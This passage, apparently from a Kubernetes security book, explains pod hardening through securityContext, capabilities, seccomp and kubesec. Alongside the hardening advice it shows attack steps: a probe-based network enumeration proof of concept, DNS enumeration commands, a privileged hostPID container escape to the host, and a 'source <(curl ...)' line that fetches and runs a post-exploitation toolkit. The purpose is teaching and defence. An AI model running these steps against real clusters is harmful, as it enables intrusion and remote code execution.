If a TLS-intercepting middlebox intercepts and rewrites an image tag, a spoofed image may be deployed. Again, TUF and Notary side-channel signing mitigates against this, as do other container signing approaches like cosign, as discussed in Chapter 4.
Your liveness probes should be tuned to your application’s performance characteristics, and used to keep them alive in the stormy waters of your production environment. Probes inform Kubernetes if the application is incapable of fulfilling its specified purpose, perhaps through a crash or external system failure.
The Kubernetes audit finding TOB-K8S-024 shows probes can be subverted by an attacker with the ability to schedule pods: without changing the pod’s command or args, they have the power to make network requests and execute commands within the target container. This yields local network discovery to an attacker, as the probes are executed by the Kubelet on the host networking interface, and not from within the pod. A host header can be used here to enumerate the local network. Their proof of concept exploit:
apiVersion: v1
kind: Pod
# ...
    livenessProbe:
      httpGet:
        host: 172.31.6.71
        path: /
        port: 8000
        httpHeaders:
        - name: Custom-Header
          value: Awesome
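By contrast, a probe that omits the host field is executed against the pod’s own IP, which is the conventional pattern; a minimal sketch (path, port, and timings are illustrative):

livenessProbe:
  httpGet:
    path: /healthz        # no "host" field: the Kubelet probes the pod's own IP
    port: 8080
  initialDelaySeconds: 5
  periodSeconds: 10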
Resource limits and requests, which manage the pod’s cgroups, prevent the exhaustion of finite memory and compute resources on the Kubelet host, and defend from fork bombs and runaway processes. Networking bandwidth limits are not supported in the pod spec, but may be supported by your CNI implementation.

cgroups are a useful resource constraint. cgroups v2 offers more protection, but cgroups v1 is not a security boundary and can be escaped easily.
Limits restrict the potential cryptomining or resource exhaustion that a malicious container can execute. It also stops the host becoming overwhelmed by bad deployments. It has limited effectiveness against an adversary looking to further exploit the system unless they need to use a memory-hungry attack.
resources:
  limits:
    cpu: 200m
    memory: 128Mi
  requests:
    cpu: 100m
    memory: 64Mi
By default Kubernetes DNS servers provide all records for services across the cluster, preventing namespace segregation unless deployed individually per-namespace or domain.
CoreDNS supports policy plugins, including Open Policy Agent, to restrict access to DNS records and defeat the following enumeration attacks.
The default Kubernetes CoreDNS installation leaks information about its services, and offers an attacker a view of all possible network endpoints. Of course they may not all be accessible due to network policy.
DNS enumeration can be performed against a default, unrestricted CoreDNS installation. To retrieve all services in the cluster namespace:
[email protected]:/ [0]# dig +noall +answer srv any.any.svc.cluster.local | sort --human-numeric-sort --key 7
any.any.svc.cluster.local. 30 IN SRV 0 6 53 kube-dns.kube-system.svc.cluster.local.
any.any.svc.cluster.local. 30 IN SRV 0 6 80 frontend-external.default.svc.cluster.local.
any.any.svc.cluster.local. 30 IN SRV 0 6 80 frontend.default.svc.cluster.local.
any.any.svc.cluster.local. 30 IN SRV 0 6 443 kubernetes.default.svc.cluster.local.
any.any.svc.cluster.local. 30 IN SRV 0 6 3550 productcatalogservice.default.svc.cluster.local.
# ...
For all service endpoints and names:
[email protected]:/ [0]# dig +noall +answer srv any.any.any.svc.cluster.local | sort --human-numeric-sort --key 7
any.any.any.svc.cluster.local. 30 IN SRV 0 3 53 192-168-155-129.kube-dns.kube-system.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN SRV 0 3 53 192-168-156-130.kube-dns.kube-system.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN SRV 0 3 3550 192-168-156-133.productcatalogservice.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN SRV 0 3 5050 192-168-156-131.checkoutservice.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN SRV 0 3 6379 192-168-156-136.redis-cart.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN SRV 0 3 6443 10-0-1-1.kubernetes.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN SRV 0 3 7000 192-168-156-135.currencyservice.default.svc.cluster.local.
# ...
To return an IPv4 address based on the query:
[email protected]:/ [0]# dig +noall +answer 1-3-3-7.default.pod.cluster.local
1-3-3-7.default.pod.cluster.local. 23 IN A 1.3.3.7
Kubernetes API server service IP information is mounted into the pod’s environment by default:
[email protected]:~ [0]# env | grep KUBE
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.7.240.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.7.240.1
KUBERNETES_SERVICE_HOST=10.7.240.1
KUBERNETES_PORT=tcp://10.7.240.1:443
KUBERNETES_PORT_443_TCP_PORT=443
[email protected]:~ [0]# curl -k https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/version
{
  "major": "1",
  "minor": "19+",
  "gitVersion": "v1.19.9-gke.1900",
  "gitCommit": "008fd38bf3dc201bebdd4fe26edf9bf87478309a",
  # ...
The response matches the API server’s /version endpoint.
Detect Kubernetes API servers with this nmap script and the following function:
nmap-kube-apiserver() {
  local REGEX="major.*gitVersion.*buildDate"
  local ARGS="${@:-$(
    kubectl config view --minify |
      awk '/server:/{print $2}' |
      sed -E -e 's,^https?://,,' -e 's,:, -p ,g'
  )}"
  nmap --open -d --script=http-get --script-args "
    http-get.path=/version,
    http-get.match="${REGEX}",
    http-get.showResponse,
    http-get.forceTls
  " ${ARGS}
}
This pod is running with an empty securityContext, which means that without admission controllers mutating the configuration at deployment time, the container can run a root-owned process and has all capabilities available to it:
securityContext: {}
Exploiting the capability landscape involves an understanding of the kernel’s flags, and Stefano Lanaro’s guide provides a comprehensive overview.
Different capabilities may have particular impact on a system, and CAP_SYS_ADMIN and CAP_BPF are particularly enticing to an attacker. Notable capabilities you should be cautious about granting include:

CAP_DAC_OVERRIDE, CAP_CHOWN, CAP_DAC_READ_SEARCH, CAP_FOWNER, CAP_SETFCAP: bypass filesystem permissions
CAP_SETUID, CAP_SETGID: become the root user
CAP_NET_RAW: read network traffic
CAP_SYS_ADMIN: filesystem mount permission
CAP_SYS_PTRACE: all-powerful debugging of other processes
CAP_SYS_MODULE: load kernel modules to bypass controls
CAP_PERFMON, CAP_BPF: access deep-hooking BPF systems
These are the precursors for many container breakouts. As Brad Geesaman points out in Figure 2-11, processes want to be free! And an adversary will take advantage of anything within the pod they can use to escape.
CAP_NET_RAW is enabled by default in runc, and enables UDP (which bypasses TCP service meshes like Istio), ICMP, and ARP poisoning attacks. Aqua found DNS poisoning attacks against Kubernetes DNS that abuse it, and because the net.ipv4.ping_group_range sysctl flag allows unprivileged ICMP, the capability should be dropped even when ICMP is needed.
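A minimal sketch of that mitigation: allow unprivileged ICMP via the (safe) ping_group_range sysctl and drop CAP_NET_RAW from the container (the image name is illustrative):

spec:
  securityContext:
    sysctls:
    - name: net.ipv4.ping_group_range
      value: "0 2147483647"     # unprivileged ping without CAP_NET_RAW
  containers:
  - name: app
    image: nginx:1.21
    securityContext:
      capabilities:
        drop: ["NET_RAW"]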
Some container breakouts require root and/or CAP_SYS_ADMIN, CAP_NET_RAW, CAP_BPF, or CAP_SYS_MODULE to function:

/proc/self/exe (described in Chapter 5)
Subpath volume mount traversal (described in Chapter 5)
CVE-2016-5195 (read-only memory copy-on-write race condition, aka DirtyCow, detailed in “Architecting Containerised Applications for Resilience”)
CVE-2020-14386 (an unprivileged memory corruption bug that requires CAP_NET_RAW)
CVE-2021-30465 (runc mount destination symlink-exchange swap to mount outside the rootfs, limited by use of an unprivileged user)
CVE-2021-22555 (Netfilter heap out-of-bounds write that requires CAP_NET_RAW)
CVE-2021-31440 (eBPF out-of-bounds access to the Linux kernel requiring root or CAP_BPF, and CAP_SYS_MODULE)
@andreyknvl’s kernel bugs and core_pattern escape
When there’s no breakout, root capabilities are still required for a number of other attacks, such as CVE-2020-10749 (Kubernetes CNI plugin MitM attacks via IPv6 rogue router advertisements)
The excellent Compendium of Container Escapes goes into more detail on some of these attacks.
We enumerate the options available in a securityContext for a pod to defend itself from hostile containers in the runtime policies section.
Service Accounts are JWTs (JSON Web Tokens) used for authorisation by pods. The default service account shouldn’t be given any permissions, and by default it comes with no authorisation.
A pod’s serviceAccount configuration defines its access privileges with the API server; see the service accounts section for the details. The service account is mounted into all pod replicas, which share the single “workload identity”.
serviceAccount: default
serviceAccountName: default
Segregating duty in this way reduces the blast radius if a pod is compromised: limiting an attacker post-intrusion is a primary goal of policy controls.
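If a workload never needs to talk to the API server, you can avoid mounting the token at all; a minimal sketch (pod name and image are illustrative):

apiVersion: v1
kind: Pod
metadata:
  name: no-api-access
spec:
  serviceAccountName: default
  automountServiceAccountToken: false   # no token under /var/run/secrets/kubernetes.io/
  containers:
  - name: app
    image: nginx:1.21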
The scheduler is responsible for allocating a pod workload to a node. It looks as follows:
schedulerName: default-scheduler
tolerations:
- effect: NoExecute
  key: node.kubernetes.io/not-ready
  operator: Exists
  tolerationSeconds: 300
- effect: NoExecute
  key: node.kubernetes.io/unreachable
  operator: Exists
  tolerationSeconds: 300
A hostile scheduler could conceivably exfiltrate data or workloads from the cluster, but this requires the cluster to be compromised in order to add the scheduler to the control plane. It would be easier to schedule a privileged container and root the control plane kubelets.
Here we are using a bound service account token, defined in YAML as a projected service account token (instead of a standard service account). The Kubelet protects this against exfiltration by regularly rotating it (configured for every 3600 seconds, or one hour), so it’s only of limited use if stolen. An attacker with persistence is still able to use this value, and can observe it rotating, so this only protects the service account after the attack has completed.
volumes:
- name: kube-api-access-p282h
  projected:
    defaultMode: 420
    sources:
    - serviceAccountToken:
        expirationSeconds: 3600
        path: token
    - configMap:
        items:
        - key: ca.crt
          path: ca.crt
        name: kube-root-ca.crt
    - downwardAPI:
        items:
        - fieldRef:
            apiVersion: v1
            fieldPath: metadata.namespace
          path: namespace
Volumes are a rich source of potential data for an attacker, and you should ensure that standard security practices like discretionary access control (DAC, e.g. file ownership and permissions) are correctly configured.
The downwardAPI reflects Kubernetes-level values into the containers in the pod, and is useful to expose things like the pod’s name, namespace, UID, labels, and annotations into the container. Its capabilities are listed in the docs.
The container is just Linux and will not protect incorrectly configured data.
Network information about the pod is useful to debug containers without services, or that aren’t responding as they should, but an attacker might use this information to connect directly to a pod without scanning the network.
status:
  hostIP: 10.0.1.3
  phase: Running
  podIP: 192.168.155.130
  podIPs:
  - ip: 192.168.155.130
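Because pod and host IPs are easily discovered, a default-deny ingress policy limits who can connect to a pod directly; a minimal sketch, assuming your CNI plugin enforces NetworkPolicy:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-ingress
  namespace: default
spec:
  podSelector: {}          # selects every pod in the namespace
  policyTypes:
  - Ingress                # no ingress rules defined, so all inbound traffic is denied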
A pod is more likely to be compromised if a securityContext is not configured, or is too permissive. It is your most effective tool to prevent container breakout.
Once an attacker has gained an RCE into a running pod, the security context is the first line of defensive configuration available to a defender. It exposes kernel switches that can be set individually, and additional Linux Security Modules can be configured with fine-grained policies that prevent hostile applications from taking advantage of your systems.
Docker’s containerd has a default seccomp profile that has prevented some zero-day attacks against the container runtime by blocking system calls in the kernel. From Kubernetes v1.22 you can enable this by default for all runtimes with the --seccomp-default Kubelet flag. In some cases workloads may not run with the default profile: observability or security tools may require low-level kernel access. These workloads should have custom seccomp profiles written (rather than resorting to running them Unconfined, which allows any system call).

Here’s an example of a fine-grained seccomp profile loaded from the host’s filesystem under /var/lib/kubelet/seccomp:
securityContext:
  seccompProfile:
    type: Localhost
    localhostProfile: profiles/fine-grained.json
Seccomp is for system calls, but SELinux and AppArmor can monitor and enforce policy in userspace too, protecting files, directories, and devices.
SELinux configuration is able to block most container breakouts with its label-based approach to filesystem and process access: it doesn’t allow containers to write anywhere but their own filesystem, nor to read other directories, and it comes enabled on OpenShift and Red Hat Linuxes.
AppArmor can similarly monitor and prevent many attacks in Debian Linuxes. If AppArmor is enabled, then cat /sys/module/apparmor/parameters/enabled returns Y, and it can be used in pod definitions:
metadata:
  annotations:
    container.apparmor.security.beta.kubernetes.io/hello: localhost/k8s-apparmor-example-deny-write
The privileged flag was quoted as being “the most dangerous flag in the history of computing” by Liz Rice, but why are privileged containers so dangerous? Because they leave the process namespace enabled to give the illusion of containerisation, but actually disable all security features.

“Privileged” is a specific securityContext configuration: all but the process namespace is disabled, virtual filesystems are unmasked, LSMs are disabled, and all capabilities are granted.
Running as a non-root user without capabilities, and setting allowPrivilegeEscalation to false, provides robust protection against many privilege escalations:
spec:
  containers:
  - image: controlplane/hack
    securityContext:
      allowPrivilegeEscalation: false
The granularity of security contexts means each property of the configuration must be tested to ensure it is not set: as a defender by configuring admission control and testing YAML; as an attacker with a dynamic test (or amicontained) at runtime.
We explore how to detect privileges inside a container later in this chapter.
Sharing namespaces with the host also reduces the isolation of the container and opens it to greater potential risk. Any mounted filesystems effectively add to the mount namespace.
Ensure your pods’ securityContext is correct, and your systems will be safer against known attacks.
Kubesec is a simple tool to validate the security of a Kubernetes resource.
It returns a risk score for the resource, and advises on how to tighten the security context:
$ cat <<EOF > kubesec-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: kubesec-demo
spec:
  containers:
  - name: kubesec-demo
    image: gcr.io/google-samples/node-hello:1.0
    securityContext:
      readOnlyRootFilesystem: true
EOF
$ docker run -i kubesec/kubesec:2.11.1 scan - < kubesec-test.yaml
[
  {
    "object": "Pod/kubesec-demo.default",
    "valid": true,
    "fileName": "STDIN",
    "message": "Passed with a score of 1 points",
    "score": 1,
    "scoring": {
      "passed": [
        {
          "id": "ReadOnlyRootFilesystem",
          "selector": "containers[] .securityContext .readOnlyRootFilesystem == true",
          "reason": "An immutable root filesystem can prevent malicious binaries being added to PATH and increase attack cost",
          "points": 1
        }
      ],
      "advise": [
        {
          "id": "ApparmorAny",
          "selector": ".metadata .annotations .\"container.apparmor.security.beta.kubernetes.io/nginx\"",
          "reason": "Well defined AppArmor policies may provide greater protection from unknown threats. WARNING: NOT PRODUCTION READY",
          "points": 3
        },
        {
          "id": "ServiceAccountName",
          "selector": ".spec .serviceAccountName",
          "reason": "Service accounts restrict Kubernetes API access and should be configured with least privilege",
          "points": 3
        },
        {
          "id": "SeccompAny",
          "selector": ".metadata .annotations .\"container.seccomp.security.alpha.kubernetes.io/pod\"",
          "reason": "Seccomp profiles set minimum privilege and secure against unknown threats",
          "points": 1
        },
        # ...
Kubesec.io documents practical changes to make to your security context, and we’ll document some of them here.
Shopify’s excellent kubeaudit provides similar functionality for all resources in a cluster.
The NSA published a Kubernetes Hardening Guidance document that recommends a hardened set of securityContext standards. It recommends scanning for vulnerabilities and misconfigurations, least privilege, good RBAC and IAM, network firewalling and encryption, and “to periodically review all Kubernetes settings and use vulnerability scans to help ensure risks are appropriately accounted for and security patches are applied”.
Assigning least privilege to a container in a pod is the responsibility of the securityContext. PodSecurityPolicy maps onto the configuration flags available in a Pod or Container’s securityContext. Let’s explore these in more detail using the kubesec static analysis tool, and the selectors it uses to interrogate your Kubernetes resources:
containers[] .securityContext .privileged
A running privileged container is potentially a bad day for your security team. Privileged containers disable namespaces (except the process namespace) and LSMs, grant all capabilities, expose the host’s devices through /dev, and are generally insecure by default. This is the first thing an attacker looks for in a newly compromised pod.
.spec .hostPID
hostPID allows traversal from the container to the host through the /proc filesystem, which symlinks other processes’ root filesystems. To read from the host’s process namespace, privileged is needed as well:
$ kubectl run privileged-and-hostpid --restart=Never -ti --rm --image lol \
    --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["/bin/sh"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
/ $ grep PRETTY_NAME /etc/*release*
PRETTY_NAME="Alpine Linux v3.13"
/ $ ps faux | head
PID USER TIME COMMAND
1 root 0:07 /usr/lib/systemd/systemd noresume noswap cros_efi
2 root 0:00 [kthreadd]
3 root 0:00 [rcu_gp]
4 root 0:00 [rcu_par_gp]
6 root 0:00 [kworker/0:0H-kb]
9 root 0:00 [mm_percpu_wq]
10 root 0:00 [ksoftirqd/0]
11 root 1:33 [rcu_sched]
12 root 0:00 [migration/0]
/ $ grep PRETTY_NAME /proc/1/root/etc/*rel*
/proc/1/root/etc/os-release:PRETTY_NAME="Container-Optimized OS from Google"
In this session we start a privileged container sharing the host’s process namespace, check the distribution version inside the container, verify that we’re in the host’s process namespace (we can see PID 1 and the kernel helper processes), and finally check the distribution version of the host via the /proc filesystem.
Without privileged, the host’s process namespace is inaccessible to root in the container:
/ $ grep PRETTY_NAME /proc/1/root/etc/*release*
grep: /proc/1/root/etc/*release*: Permission denied
In this case the attacker is limited to searching the filesystem or memory as their UID allows, hunting for key material or sensitive data.
.spec .hostNetwork
Host networking access allows us to sniff traffic or send fake traffic over the host adapter (but only if we have permission to do so, enabled by root and CAP_NET_RAW or CAP_NET_ADMIN), and to evade network policy (which depends on traffic originating from the expected source IP of the adapter in the pod’s network namespace).
It also grants access to services bound to the host’s loopback adapter (localhost in the root network namespace), which was traditionally considered a security boundary. Server-Side Request Forgery (SSRF) attacks have reduced the incidence of this pattern, but it may still exist (the Kubernetes API server’s --insecure-port used this pattern until it was deprecated in v1.10 and finally removed in v1.20).
.spec .hostAliases
Permits pods to override their local /etc/hosts files. This may have more operational implications (like not being updated in a timely manner and causing an outage) than security connotations.
.spec .hostIPC
Gives the pod access to the host’s Interprocess Communication (IPC) namespace, where it may be able to interfere with trusted processes on the host. It’s likely this will enable simple host compromise via /usr/bin/ipcs or files in shared memory at /dev/shm.
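The host namespace flags all sit at the pod level of the spec, which makes them straightforward to test for and reject in admission control. Below is a minimal sketch of the settings to look for (each defaults to false when omitted; the pod name and image are placeholders):

apiVersion: v1
kind: Pod
metadata:
  name: host-namespace-demo   # illustrative name
spec:
  hostPID: true       # share the host's process namespace
  hostIPC: true       # share the host's IPC namespace
  hostNetwork: true   # share the host's network namespace
  containers:
  - name: app
    image: alpine     # placeholder image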
containers[] .securityContext .runAsNonRoot
The root user has special permissions and privileges in a Linux system, and this is no different within a container (although they are somewhat reduced). Preventing root from owning the processes inside the container is a simple and effective security measure. It stops many of the container breakout attacks listed in this book, and adheres to standard, established Linux security practice.
containers[] .securityContext .runAsUser > 10000
In addition to preventing root from running processes, enforcing high UIDs for containerised processes lowers the risk of breakout when user namespaces are not in use: if the user in the container (e.g. 12345) has an equivalent UID on the host (that is, also 12345), and the user in the container is able to reach host resources through a mounted volume or shared namespace, then those resources may be accidentally shared and allow container breakout (e.g. through filesystem permissions and authorisation checks).
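At the pod level this might look like the following sketch; the UID and GID values are arbitrary high numbers chosen for illustration, and the image is reused from the kubesec example:

apiVersion: v1
kind: Pod
metadata:
  name: high-uid-demo    # illustrative name
spec:
  securityContext:       # applies to all containers in the pod
    runAsNonRoot: true
    runAsUser: 12345     # arbitrary UID above 10000
    runAsGroup: 12345    # arbitrary GID above 10000
    fsGroup: 12345       # group ownership applied to mounted volumes
  containers:
  - name: app
    image: gcr.io/google-samples/node-hello:1.0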
containers[] .securityContext .readOnlyRootFilesystem
Immutability is not a security boundary, as code can be downloaded from the internet and run by an interpreter (such as Bash, PHP, or Java) without touching the filesystem, as the bashark post-exploitation toolkit shows:
/tmp # source <(curl -s https://raw.githubusercontent.com/redcode-labs/Bashark/master/bashark.sh)

[... Bashark ASCII-art banner ...]

[*] Type 'help' to show available commands
bashark_2.0$
Filesystem locations like /tmp and /dev/shm will probably always be writable to support application behaviour, so a read-only root filesystem cannot be relied upon as a security boundary. Immutability will protect against some drive-by and automated attacks, but it is not a robust control on its own.
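A common pattern is to make the root filesystem read-only and give the application a dedicated scratch volume for the paths it genuinely needs to write to. A minimal sketch (the pod name, mount path, and volume name are illustrative):

apiVersion: v1
kind: Pod
metadata:
  name: readonly-demo    # illustrative name
spec:
  containers:
  - name: app
    image: gcr.io/google-samples/node-hello:1.0
    securityContext:
      readOnlyRootFilesystem: true
    volumeMounts:
    - name: scratch
      mountPath: /tmp    # only this path is writable
  volumes:
  - name: scratch
    emptyDir: {}         # ephemeral scratch space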
Intrusion detection tools such as falco and tracee can detect new Bash shells spawned in a container (or any non-allowlisted applications). Additionally, tracee can detect in-memory execution of malware that attempts to hide itself, by observing /proc/<pid>/maps for memory that was once writeable but is now executable.
We look at Falco in more detail in Chapter 9.
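As a flavour of what that detection can look like, here is a rough sketch in Falco’s rule syntax; the rule name, shell list, and output string are illustrative, and Falco’s default ruleset already ships a similar rule:

- rule: Shell spawned in container (illustrative)
  desc: Detect an interactive shell starting inside a container
  condition: spawned_process and container and proc.name in (bash, sh, ash)
  output: "Shell in container (user=%user.name container=%container.name cmdline=%proc.cmdline)"
  priority: WARNING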
containers[] .securityContext .capabilities .drop | index("ALL")
You should always drop all capabilities and only re-add those that your application needs to operate.
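For example, a web server that only needs to bind a low port might use a container fragment like this sketch (the image and the re-added capability are assumptions about the application’s needs):

containers:
- name: web
  image: nginx:1.21             # placeholder image
  securityContext:
    capabilities:
      drop: ["ALL"]             # start from zero capabilities
      add: ["NET_BIND_SERVICE"] # re-add only what is needed to bind port 80/443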
containers[] .securityContext .capabilities .add | index("SYS_ADMIN")
The presence of this capability is a red flag: try to find another way to deploy any container that requires this, or deploy into a dedicated namespace with custom security rules to limit the impact of compromise.
containers[] .resources .limits .cpu, .memory
Limiting the total amount of memory available to a container prevents denial-of-service attacks from taking out the host machine, as the container dies first (CPU limits throttle rather than kill).
containers[] .resources .requests .cpu, .memory
Requesting resources helps the scheduler to “bin pack” resources effectively, and has no security connotations beyond a hostile API client trying to squeeze more pods onto a specific node.
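A container fragment showing both settings might look like this sketch (the values are arbitrary and should be sized to the application):

containers:
- name: app
  image: gcr.io/google-samples/node-hello:1.0
  resources:
    requests:
      cpu: 100m          # helps the scheduler place the pod
      memory: 128Mi
    limits:
      cpu: 500m          # throttled beyond this
      memory: 256Mi      # OOM-killed beyond this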
.spec .volumes[] .hostPath .path
A writable /var/run/docker.sock host mount allows breakout to the host. Any filesystem that an attacker can write a symlink to is vulnerable, and an attacker can use that path to explore and exfiltrate from the host.
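This is the kind of volume definition to hunt for, or to block in admission control; the pod name is illustrative:

apiVersion: v1
kind: Pod
metadata:
  name: docker-sock-demo   # illustrative name
spec:
  containers:
  - name: app
    image: alpine          # placeholder image
    volumeMounts:
    - name: docker-sock
      mountPath: /var/run/docker.sock
  volumes:
  - name: docker-sock
    hostPath:
      path: /var/run/docker.sock   # full control of the node's container runtime
      type: Socket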
The Captain and crew have had a fruitless raid, but this is not the last we will hear of their escapades.
If we zoom in on the relationship between a single pod and the host in Figure 2-12, we can see the services offered to the container by the Kubelet and potential security boundaries that may keep an adversary at bay.
As we progress through this book, we will see how these components interact, and we will witness Captain Hashjack’s efforts to exploit them.
There are multiple layers of configuration to secure for a pod to be used safely, and the workloads you run are the soft underbelly of Kubernetes security.
The pod is the first line of defence and the most important part of a cluster to protect. Application code changes frequently and is likely to be a source of potentially exploitable bugs.
To extend the anchor and chain metaphor, a cluster is only as strong as its weakest link. To be provably secure, you must use robust configuration testing, preventative controls and policy in the pipeline and admission control, and runtime intrusion detection, as nothing is infallible.